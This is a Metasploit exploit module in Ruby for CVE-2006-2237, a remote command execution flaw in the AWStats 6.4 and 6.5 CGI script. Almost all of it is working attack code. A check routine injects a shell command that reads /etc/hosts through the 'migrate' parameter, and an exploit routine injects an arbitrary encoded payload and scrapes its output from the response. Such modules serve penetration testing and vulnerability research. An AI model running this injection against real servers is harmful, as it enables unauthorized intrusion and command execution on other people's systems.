## # $Id$ ## ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'AWStats migrate Remote Command Execution', 'Description' => %q{ This module exploits an arbitrary command execution vulnerability in the AWStats CGI script. AWStats v6.4 and v6.5 are vulnerable. Perl based payloads are recommended with this module. The vulnerability is only present when AllowToUpdateStatsFromBrowser is enabled in the AWstats configuration file (non-default). }, 'Author' => [ 'patrick' ], 'License' => MSF_LICENSE, 'Version' => '$Revision$', 'References' => [ ['CVE', '2006-2237'], ['OSVDB', '25284'], ['BID', '17844'], ['URL', 'http://awstats.sourceforge.net/awstats_security_news.php'], ['EDB', '1755'], ], 'Privileged' => false, 'Payload' => { 'DisableNops' => true, 'Space' => 512, 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic perl ruby python bash telnet', } }, 'Platform' => 'unix', 'Arch' => ARCH_CMD, 'Targets' => [[ 'Automatic', { }]], 'DisclosureDate' => 'May 04 2006', 'DefaultTarget' => 0)) register_options( [ OptString.new('URI', [true, "The full URI path to awstats.pl", "/cgi-bin/awstats.pl"]), OptString.new('AWSITE', [true, "The AWStats config site name", "demo"]), ], self.class) end def check res = send_request_cgi({ 'uri' => datastore['URI'], 'vars_get' => { 'migrate' => "|echo;cat /etc/hosts;echo|awstats#{Rex::Text.rand_text_numeric(6)}.#{datastore['AWSITE']}.txt" } }, 25) if (res and res.body.match(/localhost/)) return Exploit::CheckCode::Vulnerable end return Exploit::CheckCode::Safe end def exploit command = Rex::Text.uri_encode("cd /tmp &&" + payload.encoded) sploit = datastore['URI'] + "?migrate=|echo;echo%20YYY;#{command};echo%20YYY;echo|awstats#{Rex::Text.rand_text_numeric(6)}.#{datastore['AWSITE']}.txt" res = send_request_raw({ 'uri' => sploit, 'method' => 'GET', 'headers' => { 'User-Agent' => 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)', 'Connection' => 'Close', } }, 25) if (res) print_status("The server returned: #{res.code} #{res.message}") m = res.body.match(/YYY\n(.*)\nYYY/m) if (m) print_status("Command output from the server:") print("\n" + m[1] + "\n\n") else print_status("This server may not be vulnerable") end else print_status("No response from the server") end end end